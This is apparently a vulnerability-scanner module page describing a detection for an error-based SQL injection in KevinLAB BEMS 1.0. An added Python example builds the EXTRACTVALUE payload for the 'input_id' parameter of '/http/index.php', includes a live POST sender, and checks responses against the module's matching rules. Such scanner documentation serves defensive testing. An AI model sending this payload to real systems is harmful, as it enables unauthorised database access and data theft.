
KevinLAB BEMS 1.0 - SQL Injection

By kannthu

Critical
Vidoc Module
#kevinlab #sqli #edb #packetstorm
Description

What is the "KevinLAB BEMS 1.0 - SQL Injection" module?

The "KevinLAB BEMS 1.0 - SQL Injection" module detects a SQL injection vulnerability in the KevinLAB BEMS 1.0 software. The flaw lets an attacker alter the SQL queries the application executes, which can lead to unauthorized access, data leakage, or further compromise of the backend database. The severity is classified as critical because of the high potential impact on the system.

This module was authored by gy741.

Impact

Successful exploitation of the SQL injection vulnerability in KevinLAB BEMS 1.0 can have severe consequences. An attacker can run arbitrary SQL statements against the application's database: reading sensitive data, modifying or deleting records, and, where the injectable parameter feeds a login query, bypassing authentication. Depending on the database configuration, this can extend to a compromise of the entire system, loss of data, and potential legal and financial consequences.

How does the module work?

The module sends a crafted HTTP POST request to the target application's "/http/index.php" endpoint. The request body carries a payload in the "input_id" parameter that injects SQL calling the MySQL "EXTRACTVALUE" function with a deliberately invalid XPath expression containing a marker string. Because the database quotes the invalid expression verbatim in its error message, the marker comes back in the HTTP response only if the parameter value was concatenated into a query and executed by the database. This is an error-based SQL injection probe: it confirms the injection without needing to extract data blindly.

The module then applies its matching conditions. The response must contain both the string "XPATH syntax error" and the quoted marker "'\ZSL1ZSL'", and the HTTP status code must be 200. Requiring the error string together with the quoted marker (rather than the marker alone) avoids a false positive when the application merely echoes the submitted input back to the user.

Only when all of these conditions hold does the module report the target application as vulnerable to SQL injection.

Module preview

Concurrent Requests (1)

1. HTTP Request template

Raw request

Matching conditions (all must match):
- word: "XPATH syntax error", "'\ZSL1ZSL'" (and)
- status: 200

Passive global matcher: no matching conditions.

On match action: Report vulnerability
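The probe and matcher described in "How does the module work?" and summarized in the module preview above, written out as an added Python example. This is not the Vidoc module's own code and the exact request body the module sends is not shown on the page; the EXTRACTVALUE payload, the sample responses and the helper names below are assumptions used to illustrate the error-based technique and the reason the matcher requires both the error string and the backslash-prefixed marker.

```python
import re
import urllib.request
from dataclasses import dataclass
from urllib.parse import urlencode

# Values taken from the page: endpoint, parameter and marker string.
TARGET_PATH = "/http/index.php"
PARAM = "input_id"
MARKER = "ZSL1ZSL"

# Matcher words from the module preview. The backslash before the marker is
# what MySQL prints when the invalid XPath expression began with 0x5c.
ERROR_WORD = "XPATH syntax error"
MARKER_WORD = f"'\\{MARKER}'"


def build_probe(marker: str = MARKER) -> str:
    # Illustrative error-based payload (assumption, not the module's exact body).
    # EXTRACTVALUE() is given an XPath expression starting with a backslash
    # (0x5c), which is never valid XPath, so MySQL raises
    # "XPATH syntax error: '\<marker>'" and quotes the expression back.
    return f"' AND EXTRACTVALUE(1,CONCAT(0x5c,'{marker}'))-- -"


def build_request_body(marker: str = MARKER) -> str:
    # Form-encoded POST body for the input_id parameter.
    return urlencode({PARAM: build_probe(marker)})


@dataclass
class HttpResponse:
    status: int
    body: str


def is_vulnerable(resp: HttpResponse) -> bool:
    # Mirror the module's conditions: both words present AND status 200.
    return (
        resp.status == 200
        and ERROR_WORD in resp.body
        and MARKER_WORD in resp.body
    )


# Pulls the quoted expression out of a MySQL XPath error, if one is present.
ERROR_RE = re.compile(r"XPATH syntax error: '\\([A-Za-z0-9]+)'")


def extract_marker(resp: HttpResponse):
    m = ERROR_RE.search(resp.body)
    return m.group(1) if m else None


def send_probe(base_url: str, timeout: float = 10.0) -> HttpResponse:
    # Live request helper (hypothetical usage; not exercised offline).
    req = urllib.request.Request(
        base_url.rstrip("/") + TARGET_PATH,
        data=build_request_body().encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as r:
        return HttpResponse(r.status, r.read().decode(errors="replace"))


# Constructed sample responses (not captured from a real target).
SAMPLE_VULNERABLE = HttpResponse(
    200, "<b>Warning</b>: mysqli_query(): XPATH syntax error: '\\ZSL1ZSL' in index.php")
# Application echoes the raw input: marker present, but no DB error and no backslash.
SAMPLE_REFLECTED = HttpResponse(
    200, "No user named ' AND EXTRACTVALUE(1,CONCAT(0x5c,'ZSL1ZSL'))-- -")
# Same DB error surfaced on a 500 page: fails the module's status condition.
SAMPLE_WRONG_STATUS = HttpResponse(
    500, "Internal error: XPATH syntax error: '\\ZSL1ZSL'")
SAMPLE_CLEAN = HttpResponse(200, "Login failed")


if __name__ == "__main__":
    print("POST body:", build_request_body())
    for name, resp in [("vulnerable", SAMPLE_VULNERABLE), ("reflected", SAMPLE_REFLECTED),
                       ("wrong status", SAMPLE_WRONG_STATUS), ("clean", SAMPLE_CLEAN)]:
        print(f"{name:13s} match={is_vulnerable(resp)} marker={extract_marker(resp)}")
```

The reflected sample is the case the two-word matcher is designed for: the page echoes the marker, but without the database error string and without the leading backslash that only a real EXTRACTVALUE failure produces, so no vulnerability is reported.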